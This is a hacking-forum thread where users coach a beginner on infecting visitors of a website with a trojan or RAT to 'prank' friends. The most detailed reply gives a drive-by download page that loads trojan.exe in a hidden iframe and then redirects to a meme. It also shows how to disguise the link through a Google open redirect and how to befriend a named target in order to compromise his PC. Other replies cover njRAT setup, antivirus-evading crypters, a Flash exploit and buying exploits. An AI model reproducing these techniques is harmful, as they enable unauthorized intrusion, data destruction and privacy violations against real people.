Trojan on Websites!!


1

Hey Guys ;D

So i was thinking about launching a Trojan to prank some friends (serious prank/real Trojan) but then i came up with this idea, what if I could send them a website URL that is infected with a Trojan (mine perhaps), but here’s the problem, I have no idea how to upload/infect my website with a Trojan and i suppose that the Trojan should be written in different Language (I have no idea actually). :/
So I started this thread in case that there is some one who knows or would like to investigate and kinda help me on doing that!! :D

Thanks a lot!!
-Pain-

52replies
10voices
535views
4images
SFisher
10 years ago | edited 10 years ago

1

Normally, this kind of thing is done through Javascript holes, if I remember well Metasploit has some modules for malicious content in websites. Check it out.

If you don’t want to think too much just look for kind-of-recent vulnerabilities in browsers (Mozilla), in Flash or something similar that is already loaded into Metasploit, then you can 1. include the malicious code in your website or 2. copy a website (I think the Social Engineer’s Toolkit does this) and include the malicious code on it (like a phising but you’re probably not looking for credentials).

But of course if you want one that will never fail and never be outdated, this simple line of code is for you. Put it in the body of your page and you’ll have a trojan there forever.
<img src="http://3.bp.blogspot.com/_nYiKfX2DBu4/TE5a2JnGGvI/AAAAAAAAAQo/MyTQH5jiczE/s1600/trojanhorse.gif">


0

i want more like a Trojan that is like a RAT :/ .Also I need some help with the coding
My main idea is people access the website and be infected by the RAT that connects on a client so i can control them xD

SFisher
10 years ago

0

Eh… you can trick the user into dowloading the RAT.
Or you can use RCE vulnerabilities in the webapps I mentioned.
:)
Let’s wait to see what others have to say.


0

Hmm..Sure :D


4

21CmOfPain I suggest you put the Trojans (Or malicious cookies) in your own site opened before, to make it easier to control it.
About RAT I suggest Nj RAT ==) http://up.dev-point.com/downloadf-07168af203491-rar.html
Image


0

Just downloaded and set up Nj Rat , do you know where i can send it to test if its working? ;D

?ouo? ?????? [rekcah.ronoh]
10 years ago | edited 10 years ago

3

@21CmOfPain ==) send it to a vectim :D, seriously do you know How to make trojan with that? neither you must disable you firewall OR open the port 1177 in it.
There is more than that (details)


0

rekcah.ronoh
Routers FW and Windows are both Down, AV’s Firewall is up but i set an exception for that :D
But i couldnt wait to find a victim because most of the times It wont work so I ran it on my PC and nothing happen and nothing appeared on the connection at NjRat’s Interface… :/
(No worries i cleaned everything after a restart xD )

?ouo? ?????? [rekcah.ronoh]
10 years ago | edited 10 years ago

3

quote=21CmOfPain[/quote] ;) you must clear your registry too This is the most important thing. To clean it automatically with a simple click ==) download CCleaner and clear All the resources of your registry.

of course nothing will happen because I guess that you let the HOST 127.0.0.1 If you wanted something will happen. replace 127.0.0.1 with your IP or noip host.

?ouo? ?????? [rekcah.ronoh]
10 years ago | edited 10 years ago

3

yeah cooool this site will help you ;) , goodnight @21CmOfPain

**rekcah.ronoh Loged Out looooooooooool **

Magical Cat Does Hax [magicalcatwithhax]
10 years ago | edited 10 years ago

0

Haha Thanks :D rekcah.ronoh

I will close the thread in 4 hours in case that someone wants to post something!!

SFisher
10 years ago

-1

Image


0

Sorry but, what is that supposed to mean ? >.<

???Roun512 [roun512]
10 years ago

1

I read somewhere about Javascript editing the registry settings on windows os that shuts down the computer ~> for example i put a javascript code in my site and when he visits it the js starts :p


0

Wow hats a cool one :D I will search for it!!

Note: Dunno, I think I should give the thread a little more time to breath before ill kill it :)


4

[quote=21CmOfPain]Haha Thanks :D @rekcah.ronoh[/quote]
Anytime, you welcome :D

[quote=roun512]I read somewhere about Javascript editing the registry settings on windows os that shuts down the computer ~> for example i put a javascript code in my site and when he visits it the js starts :p[/quote]
pretty goooooood idea, hehe. to crashes computers :)

???Roun512 [roun512]
10 years ago

1

Note: Dunno, I think I should give the thread a little more time to breath before ill kill it

No need to kill it :).

Keep it open if you want :p


0

Thanks :D


0

Also I searched about the shutdown script,but it seems to be a php or something else.Cuz I read that JS doesnt have the privilege to shutdown the pc,or I misread it… :/

Pete Maynard [Osaka]
10 years ago

0

with PHP you can run something like ‘exec(“sudo halt”)’ and if the webserver has the correct permissions it will shut down the machine. But that leads us into PHP shells, and not what you are looking for.

What you would want to do is look into metasploit, something like this might be what you are looking for.

Max Lockhart [MaxLockhart]
10 years ago | edited 10 years ago

7

[It’s one of those posts again. Those who know who I am understand.]

God, it’s a fucking pain. I have no idea how one would go about doing that, but, maybe I can help you some. I wanted to post this earlier, but I ran out of my time to finish writing. Please scratch the idea of using a RAT. :( They’re very nice, very graphical, but you’re really just letting the software to the hacking and building the virus as well as spending way too much time setting up everything. RAT’s are so Skiddie'ish unless you create them yourself I guess. Look for your own vulnerabilities and please program your own tools.

Anyways, time to get back on topic…

Okay, like @SFisher said earlier that you’ll need some JavaScript to help do this.

Things you’ll need:

  1. A server to host your trojan and some code! (NOT FILE HOSTING WEBSITE OR CLOUD SERVER SHIZ)
  2. An innocent site who has never done anything wrong in their life, to help host the attack!
  3. Desired user content to better lure and distract the victim!
  4. Basic Social (Network, if you may add) Engineering skills

Simple, if you don’t want to run the attack off of your own server simply use a proxy or vpn and sign up at http://www.000webhost.com/

Alright, let’s get cooking!

First, let’s look for some content for the victim to lure them, in which, goes hand and hand with finding the innocent site. If they like Pokemon, then we’re going to find something related to Pokemon, if they like anime then there are plenty of vulnerable anime websites out there, such as animefreak, to this indirect attack. But, for the sake of this tutorial I have chosen to use Google.

Scenario Time!

So, check it out! My school mate John Smith likes memes. They crack him up! Every time I see him in computer class his friends and him are laughing at all sorts of memes on Google images. I don’t talk to him whatsoever and am almost apathetic against him. There is one thing though… this girl I have fancied for the longest time and I have got together and are getting pretty tight. But, John Doe so happens to be her ex, and he has nudes of her. I don’t like this idea so I have built a Trojan to access his computer and delete everything. He’s a pretty clever guy in society but not too computer savvy. Perfect…

You see, that’s where these social engineering techniques come in hand, along with the desired content, and innocent website. What we want with this website is the url. Something that is trustworthy and non-threatening as garbled up text looks. So, I notice he’s on Google Images a lot and it’s a very trusted source. Everyone trusts and seems to love Google. Well, I want to tell him to check out some memes right? He needs to laugh…

Google Search some memes.

Image

Boom, there you go! Freakin' gets me every time–
That’s nice and all, but what we want is this….

Image

Here you go:

**http://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&docid=109b66-mhqykrM&tbnid=BUJ_7Xz-cu91vM:&ved=0CAIQjBw&url=http%3A%2F%2F3.bp.blogspot.com%2F-d_kHaRLI0Io%2FUjIEBho-lPI%2FAAAAAAAASm0%2FcwBpYjd9HVI%2Fs1600%2Fgoats%2Bare%2Blike%2Bmushrooms.jpg&ei=1cVhU_DlMumwyQGZ8IEY&psig=AFQjCNFqFIFI0GW9p5Zrzyao7N5lFoiyaA&ust=1399002938488613**

Well, what’s the big deal? If he visits the url it just takes us to the picture, no biggy! See, that’s where the site f’d up. Notice where it read’s &url=http%3A%2F%2F3.bp.blogspot. etc? That’s the actual location of the image. Well we don’t want them to view the image… yet! ;) So We’re gonna cut all of that out, and our result is….

**http://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&docid=109b66-mhqykrM&tbnid=BUJ_7Xz-cu91vM:&ved=0CAIQjBw&url=**

After that, where the url area is, is where the link to our web server will be placed. Kind of see where this is going?
Go ahead and try http://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&docid=109b66-mhqykrM&tbnid=BUJ_7Xz-cu91vM:&ved=0CAIQjBw&url=http://www.youtube.com/ and see what happens.

Setting up the Server:

Whatever the server is that we are going to host our malicious scripts and virus on will be set up.
If you sign up at 000webhost.com create your domain name and junk, set up ftp server information, then go to it by clicking the website domain name you just created, hit go, scroll down to file manager, log in with your ftp credentials, go to the “public_html” directory, delete the default file they have in there saying your site is ready, upload, and then upload your virus along with whatever dirty script you’ve got.

Triggering Download via Browser Hijacking

Unfortunately, I couldn’t seem to figure out a way to bypass the download prompt. I’ve tried using keycode events to help toggle the enter key after the user is prompted, that didn’t work since it was loaded on the page and the external application couldn’t be affected by the pages script, tried elevating permissions in order to change the browsers settings, some PHP, and I just can’t seem to get it. Sorry about that :/ .

Though, I do have this piece of code for you

<html>  
<head>  
<script type='text/javascript'>  
function hijack() {  
    // Out of order, sorry...  
}  

function redirect() {  
    var dst = 'http://3.bp.blogspot.com/-d_kHaRLI0Io/UjIEBho-lPI/AAAAAAAASm0/cwBpYjd9HVI/s1600/goats+are+like+mushrooms.jpg';  
    window.location.assign(dst);  
}  
</script>  
</head>  
<body>  
<iframe width='1' height='1' src='trojan.exe' onload='redirect()' />  
</body>  
</html>  

As you can see the iframe is set to the trojan you programmed. This is so the download is triggered as soon as the iframe loads. After that the page simply redirects to the actual meme you want your victim to see.

So, our little malicious document is complete! Well, except for it doesn’t bypass the prompt. If anyone has anything on that, that would be fantastic. Do share, I would love to hear! Okay, we have 21CmOfPain.freedomains.com set up and running for business.

Let’s apply that to our link.

**http://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&docid=109b66-mhqykrM&tbnid=BUJ_7Xz-cu91vM:&ved=0CAIQjBw&url=http://www,21CmOfPain.com/**

Tada! Wait a minute…. ewww, that looks gross. Yeah, it says google.com in the beginning of the link but, anyone with enough sense can notice where it says 21CmOfPain.com and automatically think bad business. That’s okay, we can fix this with a little bit of URL Encoding might make it look better!

**http://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&docid=109b66-mhqykrM&tbnid=BUJ_7Xz-cu91vM:&ved=0CAIQjBw&url=http%3A%2F%2Fwww.21CmOfPain.com%2F**

It blends in a bit better now. Well, looks like the attack is ready to launch!

This is where the Social Engineering comes in:

I decided to add John Smith on Facebook and have a friendly little chat with him and things went pretty well. I did the same for the following day and got him softened up and had some interesting conversations and shared some hilarious videos. Excellent, time to initiate the attack! We started into a conversation about memes and exchanged them back and forth between each other. After a while and getting him pretty careless to visiting my links, it was time to launch the missile. Upon submitting the link I started a listening connection on port 4567 and waited for the connection, assuming that yours is well written and execute on its own that is.

  1. John Clicks the link
  2. Google Redirects him to our 21CmOfPain.com
  3. The Trojan is Downloaded
  4. John then gets redirected to a picture of a funny meme

All as if nothing had happened. The connection was established, I ran the Remote GUI to the RAT, then successfully located and deleted the photos.

Viola! h4ck3d….

That’s how you could go about doing this. I hope this information was helpful and helps you onto your way of your prank. It’s always fun to do little pranks on friends via hacking. Usually how I’ve spent most of my Winter and Summer breaks anyway. lol I again apologize that I couldn’t bypass the download prompt. It’s just that one little piece of security that would complete the whole circuit. I know it’s possible because I’ve been Browser Hijacked before and have had backdoors set up along with bypassing privileges in order to run malware onto my system. In fact most of this is written from my experience with being hijacked and examining the process.

I would again love to see someone post something on bypassing the Save / Close prompt that would be awesome and very much complete the circuit. Hope I helped some….

Happy Hacking mate!


1

Also, @Osaka PHP is Server Side so wouldn’t that just shutdown our web server not the clients machine? Or could I perform commands on anothers machine with a http CONNECT (tcp/ip) request? I do know that we could SSH into that box if we’re using PHP, but not sure about the other way.

@21CmOfPain
Another thing if you really want to get a bit deeper into the theory of hacking and information gathering, you could run the same process twice.

First send them to the link we designed and instead of trying to directly download your trojan you could modify our previous script to collect information about the users browser and store it to your server. You could then check to see if they’re using Internet Explorer. If so IE supports Visual Basic and I believe batch scripting as well. So in VB you can bypass the download prompt with some work or use batch commands to alter the browsers settings and just send them another link which includes the second script to download your Trojan. I didn’t think about that earlier… I would still like to see if anyone had any ways or techniques by using JavaScript and PHP

SFisher
10 years ago

0

Max, I knew the post was yours before reaching your name. ;)
Thank you very much, as usual, for the great great info.


0

Lol, No Problem @SFisher

?ouo? ?????? [rekcah.ronoh]
10 years ago | edited 10 years ago

1

**Shutdown PC**[/center] @21CmOfPain after some months, I write somes codes in notepad then I saved it .bat Format then I convert it to .exe format ==> I send it to a vectim via facebook Chat I Given the file the name of this victim until fall ill, curiosity and he opens the file ==> he occurred in the trap & his machine Been shutdown. [center]Sooo, I want to say that **==) to turn off a pc of someone probably is wicked more than funny (==**

If you got to the end of professionalism in the use of Any RAT (Encryption, merge,mining it, automatic downloading), you can hack all his pc (his privacy: Emails, Files, & maybe you benefit even financially Paypal cards Or Visa cards….


0

MaxLockhart , Thanks for sharing these amazing info,Now I have to learn/study on how to make a trojan…
(sadly im using my phone to browse so I cant give positive karma right now)

SFisher
10 years ago

1

@MaxLockhart , how about a flash file (a browser game, whatever) instead of a picture, and prompting the exe as an update for Flash?

[deleted user]
10 years ago | edited 10 years ago

0

Hmm in order to hack/access into the victims machine, isnt he supposed to run the trojan insted of just downloading it?
Is there a way of auto running the trojan? :D

SFisher
10 years ago

2

No, you can’t “run something on someone’s computer from a webpage”.
Unless there’s a remote command execution vulnerability (RCE) in the application in place (Flash has many of them; some solved, some being sold/discovered in the wild), I remember writing this at some moment earlier. xD
That means for example for Flash, let’s say the client is running Adobe Flash (not the new and wonderful html5 implementation); when they run it it loads into memory; if there’s a rce you can tell the SWF application to put in their memory certain “orders”, to execute actions.
This usually means you have full control over the device.

To do something like this you could find one of these yourself, or buy one (not good, they don’t really last that much) (I mean the cheap ones, and I guess you wouldn’t want to expend something over the thousand on this) (that would still be cheap though), or you could use one of the documented ones, if the client has an outdated version of the application. Remember people sometimes take weeks or months until they patch their software (some don’t do it for years).

That would be (I think) the only way to auto run the trojan.
However social engineering is in my opinion the way to go. Remember that people can patch software, update everything, etc… but you can’t patch people’s perceptions (only if they’re well trained, and sometimes high level access executives make really big mistakes so I wouldn’t count on that unfortunately). So in my opinion, the option that will always work is prompting a download that the user wants to download, with a file that the user wants to execute. It is your job to get to know the client well enough to choose which options are the best, of course (that’s the recon).


0

I see,thanks :D
Ow btw could you please recommend some websites on how to create my own trojan and its requirements?

SFisher
10 years ago

2

Could you be a little more specific?
For example what do you want it to do, how (what will be ‘the catch’, also by what means, etc), for what platform(s)…
Maybe you want to learn Assembly (you will need it). Creating it from scratch is a little tedious; I would recommend taking one that is made and experimenting with it, changing bits of code to learn what each line does. Then you can put it in a trusted program or build your own, it’s a nice way to start. Check SecurityTube for Assembly videos.

Maybe you can have a look at theSocial engineer toolkit” (and the blog), and in a more general topic, this blog.


0

SFisher, Great links I will read them all and search more in depth also I dont know any programming language so..yea could you please mention what i should learn in order to follow the basics(even thought i think i can find these by my own >.< )
Currently I have no idea about what the trojan would be able to do!

Thanks again :D

SFisher
10 years ago

1

As I said it’s better to work with something that is already made first, see what it does, then investigate and change the code (after learning a language).
Good languages to learn for exploit development are C++/C, and Assembly. If you want to trigger the download via a website, then of course Javascript.
I believe you can find multi-chapter video tutorials for these in SecurityTube.
Try to stay away from official programming language documentation because it can be very confusing at first. Go to StackOverflow, etc., and learn the things in simple terms. Investigate with those languages writing simple things. Then plunge into the code of known exploits (export them in raw from Metasploit, then read and change the source).
It will probably be a long journey. Think of it like learning a new language from scratch, it’s something that takes time to master.
You can always use automated tools for it (using plain metasploit or using one of those ‘RATs’ that you mention, something that I do NOT recommend especially if the RATs are for and from Windows; they usually come with ‘gifts’ inside, and by gifts I mean malicious extra code -> the attacker becomes the victim of someone else and doesn’t even realise). But automated tools are like online translators: crap. You don’t learn anything, you make horrible mistakes and it just doesn’t work.
Speaking well takes its time.

Good luck! :)

Cyan Wind [freewind1012]
10 years ago | edited 10 years ago

1

[quote=SFisher]they usually come with ‘gifts’ inside, and by gifts I mean malicious extra code -> the attacker becomes the victim of someone else and doesn’t even realise[/quote]
That’s a foreseen consequence for anyone who doesn’t know what he/she’s doing.

SFisher
10 years ago

1

Of course.
Not long ago I was involved in a project for including some… hmm you could call them ‘tracking tags’ in crypters for Windows.
Real (licensed) pentesters don’t (use Windows) use crypters, but develop their own. Or (maybe if in a rush) Metasploit comes with some pretty decent ones (especially the latest version).


1

Catch up time,

@SFisher Some malicious Flash Content would work I’m thinking. Flash is really flexible and supposed to have some pretty good network utilities I was told. I don’t know much about flash so if anyone has anything on that, do post! I went the JavaScript way instead of working with flash but with flash you can mess with peoples webcams and all kinds of privileged tools. What if maybe you could write a so so in browser Trojan with some JavaScript integrated with PHP? Tinker around with different connections by a script running on the client side? Do you think that would ever be possible? I think Flash would be the best way to go. Now I think about it I remember reading an article a while ago on here about in browser built viruses where that government was using a lot of malicious flash script and then using JavaScript to change the prompts that were displayed in order to toggle peoples webcams and microphones. Shit, I’ll see if I can dig it up. lol

@tlotr no problem, I had nothing else to do and thought, “I can totally do this, why not help?”

@21CmOfPain Yes, you are correct. But there are plenty methods of executing a file without users consent. One method of executing a file without user permission could be; while in your browser hijack session, set the download directory to the startup folder or edit some registry keys. Also like @SFisher said go check out some Assembly languages. The lower you are to the system the better. I really don’t understand the purpose of High-Level Programming. It’s easier and very dependent on pre-rebuilt functions and libraries. I’d rather program everything from scratch. That where originality and the programs become an art.

Fun Fact: 6502 Assembly was used in the creation of Nintendo Entertainment System, which was built on the MOS Technology 6502 core processor. I you have played Super Mario Bros. 3 you can see how this is an art. A lot more intimate with your machine man… lol the way to go.

Anywho, back on topic… yes do try to keep away from others automatic hacking programs, I guess you could call it? I’m referring to RAT’s and such. Metasploit is a pretty good tool, but it’s main purpose serves to help discover mainstream exploits. So the only good it serves is on non-patched systems or those retards who avoid updates. Which currently am doing since I have a deep system problem and am about to scrap Ubuntu itself. It’s pretty much spyware in itself, which I started a couple threads on.

Using RAT’s and skiddie tools won’t teach you anything. Get used to learning some things and always keep updated with the latest Metasploit framework but if you don’t quite understand the advanced hacking stuff, what you’re supposed to do, or how any of it work step by step I would recommend taking a look at Armitage. It’s kind of like a beginner GUI version of Metasploit and emulates CLI in real time to show you what’s going on. All of the stuff is loaded onto Kali Linux / Backtrack. Metasploit and Armitage cost money but I think that Offensive Security has a contract with them so that’s why I say use Kali or BT. All updates and everything are free. Pretty cool stuff.

Other than that…. All of the promising, “Hack a PC in a Click!” tools out there will easily fuck you and your system in the ass. I mean, let’s take that into perspective. You’re sitting in a thread right now, talking about building a Trojan to send online and execute on your targets machine. Okay, let’s think how many forums in existence there are specifically about hacking and how many threads probably exist about this same topic and made their way into ‘'promising programs’‘. lol

Now if you wanted to create your own Remote Control GUI like a RAT to better handle a large attack with multiple machines is a different story. You know what’s going into your code, what you’re programming it to do etc. I mean You could put some nasty code to steal your own credit card info and steal from yourself but that makes no sense. lol The point is to program all of your own tools, like @SFisher and @freewind1012 said about “crypters”. I think they are referring to encrypted chats? Correct my if I’m wrong, but, if you sit down and do your research and get really good at encryption then start creating your own encrypted p2p chats and stuff.

SFisher
10 years ago | edited 10 years ago

1

Great post again Max. A crypter is an encryption program that modifies/randomizes the source of another program and includes unrandomized code in the beginning so that the program auto-decrypts itself when executed. Its main purpose is to hide malicious codes from antiviruses, so that when you analyse a file it appears to be good. However heuristic analysis exist (if you want a nice antivirus, try attaching a file in Hotmail; they usually detect this “beginning decrypting code” and show the file as a virus - even if the encrypted code is actually a hello world). Also memory/flash analysis exist. So a crypter generally is an exe in which you specify pre-existing exe, and click something like “encrypt, evil genius!” and the output is a self-decrypting file that is also your original file. You often see them qualified as “FUD”, fully undetectable. Now think. If an evil genius had invented a software that can make a virus invisible… wouldn’t that person also want to spread their own viruses? Yes, right? Then why not put one of those in his crypter.
EDIT: Some people also call them encoders. I believe there are tutorials online to make your own crypter. It’s as simple as thinking of some way to shuffle a string of n elements and then un-shuffle it.

I am aware of some cool things you can do in Flash. I mentioned it for the reasons you said, it is indeed a mine of gold.
The webcam issue was first reported and openly published in 2011. By 2013 you could still do it on fully patched versions. Flash is not secure. There are safer alternatives.

Maybe I’ll write an article about nice things to do in Flash, if you want. In a week or 2.

As you said Metasploit is cool, but nothing by itself. It can be used for very obvious things but that’s it. And anyone that tested the Android reverse TCP apk knows this: in the target it first asks for ALL the permissions, then it shows as a program with the name “REVERSE TCP”. XD Metasploit is… well, a framework. You need to work with it and to feed it cool things if you want to have results. That often implies writing your own little exploits, then feeding them in a known attack vector. Metasploit’s exploits are really obvious and brutal, it’s like entering a building shooting with shotguns. Very loud and you set off a lot of alarms. It’s much better to find your subtle infil (like making the entry exploit be just a little downloader, then download tiny bits of code each time and then put it together and execute it, and make that be the main exploit - with written actions on it!! Not sending commands over the Internet) and then your subtle exfil (again making it as low profile and minimal as possible). Cobalt Strike and Armitage are good things to have a look at, like Max said.


1

Metasploit’s exploits are really obvious and brutal, it’s like entering a building shooting with shotguns.

Made me laugh my ass off, so true though. I would very much love to see an article on flash exploits. I took a VB last Semester for the fact that I and friends of mine already knew how to program and far beyond any information you’d learn in school, it’d be such an easy A, to be together and hang out since we did the same thing with the HTML 4.01 Class the school offers, and a safe haven to host malcious havoc. Well another guy in the class we all befriended knew C++ and well together we started putting together a framework similar to Metasploit called Pillage and Plunder for Script Kiddies to use. We never finished it due to personal issues that happened at home but I just recently hit him up and this summer we are going to build and release. So maybe we could add some Flash Exploits in there. It’s completely (Cyber) Pirate Themed.

That crypter stuff you talked about just blew my mind though. I think I may just need to implement that as well.

Off topic Question: How there is a section of code included in a crypter that decrypts the rest of it. Could I or should I do that with encrypted communications? For example of an encrypted chat that generates a random encryption key, encrypts the chat, and sends the message on it’s way. Should I include the encryption key inside of the message to be decrypted on the other end? Because I could see someone finding the encryption key in a man in the middle attack and decrypting the text as well. Should I send it separately? It could still be intercepted, so I see that crappy. Maybe the encryption key should be encrypted as well, include it’s own key that’s encrypted, and has a key, no? Or should the key never be sent at all? Then the DST wouldn’t be able to decrypt the message at all. Just something I was curious about and how that works….

Do you think you could find an exploit using Flash and automatically downloading a file? Maybe we could co-write an article including what I wrote before and a some Flash work around. It’d be a fully custom exploit with; something new that nobody has read yet.

SFisher
10 years ago | edited 10 years ago

1

That sounds like an interesting story and project.
I’m pretty sure Metasploit has a decent list of exploits for Flash vulns, just let me check later today.
When I said Flash is a mine of gold I meant people make money from it (from the vulns), it’s one of the most widespread markets.
With that in mind, I think the best would not be to try to find a new hole (which by the way requires a lot of knowledge that I do not have :)) but to wait for new exploits to be published; they’re found quite often so Adobe doesn’t launch a patch for each of them: they wait for a while until they have a bunch (say 30, 50, 70) and then throw the patch. That gives attackers extra time (plus the time people take until they find out there has been an update and actually update).

Also if we’re going to write an article I think it would be responsible to either not go into too much detail or just explain one of the common, semi-outdated existing exploits. Remember that publishing powerful tools ‘easy and open’ can be counterproductive sometimes: I’m sure you heard about the kid that was arrested last month for using something like ssltest.py to get 900 SIN. Some people don’t want to learn but to do bad things for the sake of evil. I do not support that.
But it would be nice to do it explaining what one of the existing ones does along with the implementation, yes. Good idea.

I’m sorry for the multispam but again for how to include the decrypting section you can find Assembly tutorials for free in SecurityTube and full courses on encoders for 64bit and 32bit.
Some more video tutorials.
Also remember that the crypter is an external program used for adding decrypting code (and encrypting the rest of the original code) to a file, always using the same method. This is now what you want; it’s better to come up with a simple altering pattern and then do little modifications of this algorithm for (mostly) every file which code you want to obfuscate.

Metasploit comes with some nice encoders/shufflers, for 64bit and 32bit and using different methods. Some set off a lot of alarms, some others are less obvious and more stealthy. But it’s better to at least modify the output code after you generate it because AVs tend to look for the “decrypting” code in the beginning.
If you use Metasploit Pro, they came up with very innovative and effective techniques for AV evasion in the last version. With these you don’t even have to modify; many AVs don’t even know how to find it yet. I believe they published some articles in the blog regarding this…

For the chat thing… speaking from ignorance I think it’s better to do it locally… (like Alice makes/has a public key that is associated to her username or that the sender (Bob) knows, Bob encrypts a message in his computer with Alice’s key, sends it via chat and Alice decrypts it locally with her private key) Maybe you could do this over a server, like Alice is prompted a “choose a password” box upon login, and that password is used to generate a public key that is then associated to her username. When someone sents her a chat message, it is encrypted and then (maybe in her machine? Doesn’t make much sense) decrypted with her private key. :/ Doesn’t sound good to me. Too much trust on the server and too much trust on the confidentiality of communications between server and client. I think it would be better to use software for it, something like implementing GPG with a chat software so that the users don’t have to manually encrypt/decrypt every single message. I believe these things exist already. But again I’m no expert.

As I said I’ll check MS for known cool Flash exploits later, to see what can be done.


0

Wow guys THANKS a lot for all of your posts.
I will update you about my progress soon.
:D

SFisher
10 years ago

0

So maybe this is something worth having a look at, huh? :)
:D


0

WOW!!A vulnerability exploit of Adobe Flash Player
before 12.0.0.43 update, right?
Nice, SFisher …But uhmm,How do you use it? >.<

Max Lockhart [MaxLockhart]
10 years ago | edited 10 years ago

0

  # Versions targeted in the wild:  
  # [*] Windows 8:  
  #   11,3,372,94, 11,3,375,10, 11,3,376,12, 11,3,377,15, 11,3,378,5, 11,3,379,14  
  #   11,6,602,167, 11,6,602,171 ,11,6,602,180  
  #   11,7,700,169, 11,7,700,202, 11,7,700,224  
  # [*] Before windows 8:  
  #   11,0,1,152,  
  #   11,1,102,55, 11,1,102,62, 11,1,102,63  
  #   11,2,202,228, 11,2,202,233, 11,2,202,235  
  #   11,3,300,257, 11,3,300,273  
  #   11,4,402,278  
  #   11,5,502,110, 11,5,502,135, 11,5,502,146, 11,5,502,149  
  #   11,6,602,168, 11,6,602,171, 11,6,602,180  
  #   11,7,700,169, 11,7,700,202  
  #   11,8,800,97, 11,8,800,50  

That’s awesome btw, thanks @SFisher

SFisher
10 years ago

0

My pleasure.

Max Lockhart [MaxLockhart]
10 years ago | edited 10 years ago

0

Ummm, don’t know Flash but, I read through it really quick and from JavaScript experience and some keywords you’re basically sending a Trojan to the user instead of the .swf content huh? That’s at least what I got from reading it.

SFisher
10 years ago | edited 10 years ago

0

Mmmmno. Well, more or less. What you’re doing is (through Flash) embed an encrypted executable in the Flash file, some shellcode and of course the code that triggers the vulnerability (this is the one that the Metasploit module you saw adds), so that when the swf loads the executable appears in the memory of the target. How? Because there’s a RCE: Flash fails to validate the memory range, so you can execute code in an arbitrary location. You make the location executable, and pass the shellcode, which is intended to plant the executable (decrypted by Flash).
So you could make a swf that does this along with other ‘normal things’ and no alarms would be set, if the exe doesn’t trigger them, of course. I mean if there’s an active scanner and the virus is in their database, it will be caught. If no active AV is in place (only manual scanning), no alarms even if it’s in their database. And if there’s an active, updated antivirus and you’ve taken a little time to take care of the AV signatures and remove certain words from the code, then it will go under the radar.
Which is why I recommend alternatives to Flash (especially, open source alternatives: Shumway is a case).

You can read a reverse-engineered analysis of the exploit (what it does, and “how” without going into too much detail) here.

735Tesla
10 years ago

0

If you really want a browser exploit that hasn’t been patched, you might have to buy one.

http://1337day.com/search
Search for “browser”

SFisher
10 years ago

0

Sorry but… buying an exploit that will last 2 days with an unknown number of other buyers doesn’t seem clever to me.
Also, surface sites are crap for this, better to find a trusted underground market in an alternative network.

If you really want a browser exploit that hasn’t been patched, do it yourself. :)
Makes sense?

jayssj11
10 years ago

0

Grams Darknet Search Engine maybe good for underground market or darknet
http://thehackernews.com/2014/04/grams-first-search-engine-for.html

SFisher
10 years ago | edited 10 years ago

0

Well that might be OK, but I wasn’t talking about Tor network. In my opinion “the onion is dead”. I don’t like it.
There are other alternatives for deep web and there are also legit vendors there and in the surface.
Exodus and Revuln are 2 big enterprises with international reputation.
But then again, this is not for someone who has no idea about exploits nor for evil geniuses. The scope of these services is to:
[list=1]
[] Make your organization or enterprise be more secure and have an advantage against the competitors by patching holes that haven’t been documented yet.
[
] Obtain critical intelligence by exploiting such holes in the infrastructures of competitors.
[/list]

Real evil geniuses know how to look for this themselves. They often work for intel agencies, enterprises like the ones I mentioned or advanced hacker organizations. I’m not talking about Anonymous and its ‘sophisticated’ social engineering and DDoS attacks.

Kids who know little will throw their parents' money for nothing, be subject to identity theft or Law Enforcement investigation, or if they actually get anything for the money, either not know how to use it, use it in a wrong way, mess with people they shouldn’t mess with, be subject to identity theft (pwned “hacker”) and Law Enforcement investigation. Using Tor doesn’t protect you from this.

Not telling anyone “don’t do things”, just explaining that things are not as simple as “click click click done”, and that risking your future for showing your friends how cool you are… is not worth it.
However again it’s up to each of us to reflect on our motivations, our means and our responsibilities.

Just my opinion in any case.

Discussion thread has been locked. You can no longer add new posts.
1 of 53

This site only uses cookies that are essential for the functionality of this website. Cookies are not used for tracking or marketing purposes.

By using our site, you acknowledge that you have read and understand our Privacy Policy, and Terms of Service.

Dismiss